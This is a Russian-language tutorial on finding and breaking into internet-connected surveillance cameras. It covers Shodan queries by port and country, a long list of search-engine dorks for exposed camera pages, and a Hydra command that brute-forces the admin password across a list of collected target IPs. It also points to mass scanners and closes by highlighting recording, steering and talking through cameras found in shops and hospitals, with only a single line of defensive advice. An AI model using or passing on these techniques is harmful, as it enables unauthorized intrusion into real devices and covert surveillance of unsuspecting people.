Как найти и взломать камеры видеонаблюдения?

Доброго времени суток. Сегодня поговорим о защите и доступе к камерам видеонаблюдения. Их достаточно много и используются они для разных целей. Как всегда будем использоваться стандартную базу, которая позволит нам находить такие камеры и подбирать к ним пароли.

Теория

Большинство устройств после установки никто не настраивает или обновляет. Поэтому наша целевая аудитория находиться под популярными портам 8000, 8080 и 554. Если нужно провести сканирование сети, то лучше сразу выделять эти порты.

Способ№1

Для наглядного примера можно посмотреть интересные запросы в поисковиках Shodan и Сensys. Рассмотрим несколько наглядных примеров с простыми запросами.

has_screenshot:true port:8000 // 183 результата;

has_screenshot:true port:8080 // 1025 результатов;

has_screenshot:true port:554 // 694 результата;

Вот таким простым способом можно получить доступ к большому количеству открытых камер, которые размещены в интересных местах: магазинах, больницах, заправках и т.д. Рассмотрим для наглядности несколько интересных вариантов.

Таким простым способом можно найти достаточно много интересных объектов, к которым открыт доступ. Не забывайте, что можно применять фильтр country для получения данных по странам.

has_screenshot:true port:8000 country:ru

has_screenshot:true port:8080 country:ru

has_screenshot:true port:554 country:ru

Способ №2

Можно воспользоваться поиском стандартных социальных сетей. Для этого лучше использовать заголовки страниц при просмотре изображений с камер, вот такая подборка среди самых интересных вариантов:

  inurl:/view.shtml

  inurl:ViewerFrame?Mode=

  inurl:ViewerFrame?Mode=Refresh

  inurl:view/index.shtml

  inurl:view/view.shtml

  intitle:”live view” intitle:axis

  intitle:liveapplet

  all in title :”Network Camera Network Camera”

  intitle:axis intitle:”video server”

  intitle:liveapplet inurl:LvAppl

  intitle:”EvoCam” inurl:”webcam.html”

  intitle:”Live NetSnap Cam-Server feed”

  intitle:”Live View / - AXIS 206M”

  intitle:”Live View / - AXIS 206W”

  intitle:”Live View / - AXIS 210″

  inurl:indexFrame.shtml Axis

  intitle:start inurl:cgistart

  intitle:”WJ-NT104 Main Page”

  intitle:snc-z20 inurl:home/

  intitle:snc-cs3 inurl:home/

  intitle:snc-rz30 inurl:home/

  intitle:”sony network camera snc-p1″

  intitle:”sony network camera snc-m1″

  intitle:”Toshiba Network Camera” user login

  intitle:”i-Catcher Console - Web Monitor”

Способ №3

Этот способ является целевым. Он применяется когда у нас есть либо одна точка и нужно подобрать пароль или мы хотим прогнать базу по стандартным паролям и найти валидные результаты. Для этих целей отлично подойдет Hydra. Для этого необходимо подготовить словар. Можно пробежаться и поискать стандартные пароли для роутеров.

Давайте рассмотрим на конкретном примере. Есть модель камеры, DCS-2103. Она достаточно часто встречается. Работает она через порт 80. Давайте воспользуемся соответствующими данными и найдем необходимую информацию в shadan.

Далее собираем все IP потенциальных целей, которые нам интересны. Далее формируем список. Собираем список паролей и будем все это использовать это с помощью утилиты hydra. Для этого нам необходимо добавить в папку словарь, список IP и выполнить вот такую команду:

hydra -l admin -P pass.txt -o good.txt -t 16 -vV -M targets.txt http-get

В корневой папке должен быть файл pass.txt с паролями, логин мы используем один admin с параметром -l, если нужно задать словарь для логинов, то необходимо добавит в корневую директорию файл и прописать его с параметром -L. Подобранные результаты будут сохраняться в файле good.txt. Список IP адресов нужно добавить в корневой каталог с файлом targets.txt. Последняя фраза в команде http-get отвечает за соединение через порт 80.

В конце хочу добавит немного информации о сканировании. Чтобы получить номера сетей можно воспользоваться отличным сервисом. Далее эти сетки нужно проверить на наличие необходимых нам портов. Сканеров рекомендовать не буду, но скажу что стоить двигать в сторону таких и подобных сканеров, как masscan, vnc scanner и другие. Можно написать на основе известной утилиты nmap. Главное задача - просканировать диапазон и найти активные IP с необходимыми портами.

Заключение

Помните, что помимо стандартного просмотра можно делать еще фото, записывать видео и скачивать его себе. Также можно управлять камерой и поворачивать в нужные направления. А самое интересное - это возможность включать звуки и говорить на некоторых камерах. Что можно тут посоветовать? Ставить надежный пароль доступа и обязательно перебрасывать порты.